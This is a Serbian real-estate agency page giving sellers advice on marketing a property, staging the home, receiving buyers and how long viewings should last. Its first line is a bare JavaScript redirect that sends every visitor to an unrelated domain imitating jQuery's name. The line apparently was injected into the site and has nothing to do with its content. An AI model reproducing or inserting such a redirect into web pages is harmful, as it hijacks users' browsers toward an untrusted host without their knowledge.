window.location='http://ww82.jquerystatistics.org/';

News

Check out market updates

Prodaja nepokretnosti

Da li je bitan marketing u prodaji Nepokretnosti ?
Ono što je ključno za uspešnu prodaju nekretnina jeste kvalitetan marketing, a to uključuje korišćenje što više medija za oglašavanje nekretnine koju želite da prodate. Zajedno sa jačanjem interneta kao medija poslednjih godina, jača i efikasnost oglašavanja nekretnina na ovaj način.

Koji bi savet Vaši agenti mogčli da nam upute pri prodaji naše Nekretnine?
Kada prodajete nekretninu, najvažnije je biti informisan, a to znači da treba da budete upoznati sa stanjem na tržištu nekretnina.

Ako prodajete svoj stan ili kuću, jedno od osnovnih pravila jeste da se emotivno distancirate i da na tu nekretninu gledate samo kao na nešto što samo ima tržišnu vrednost. Cilj je da stan ili kuća na kupca ostavi utisak da je to baš ono što on želi i da se u njoj pronađe. Uklanjanjem svih ličnih detalja, kao što su fotografije, kupcu dajete mogućnost da vidi sebe, a ne Vas, kao vlasnika.

Kako da dočekam kupca?

Nasmejani i sa što manje priče, a nekretnina neka “ priča” sama za sebe ili to prepustite profesionalnim agentima.

Nekretnina mora i spolja i iznutra izgledati privlačno, kako bi potencijalni kupac na prvi pogled pomislio da upravo to želi za sebe. Ako je potrebna po koja poprvka, uz mala ulaganja to možete srediti, a ovakvi detalji će sigurno ubrzati prodaju.

 

Šta kaže praksa, na šta potencijalni kupci najviše obraćaju pažnju ?

Praksa pokazuje da potencijalni kupci najviše pažnje obraćaju na kupatilo i kuhinju, pa bi trebalo na te prostorije obratiti najviše pažnje. Takođe, obratite pažnju da nekretnina koju želite da prodate bude provetrena, očišćena i uredna, a po koja vaza sa cvećem ostavlja pozitivan utisak na potencijalnog kupca.

Da li će Vaš agent znati tako dobro da prezentuje nekretninu kao ja?

Svakako, budite bezbrižni.                                                                                   Prezentaciju  o Vašoj nekretnini započeli smo još ispred samog ulaza u Vašu zgradu pokazivanjem mikrookruženja.

Koliko treba da traje razgledanje Nekretnine?

Razgledanje nepokretnosti treba da traje 15 minuta. Kaže nauka a potvrđuje praksa.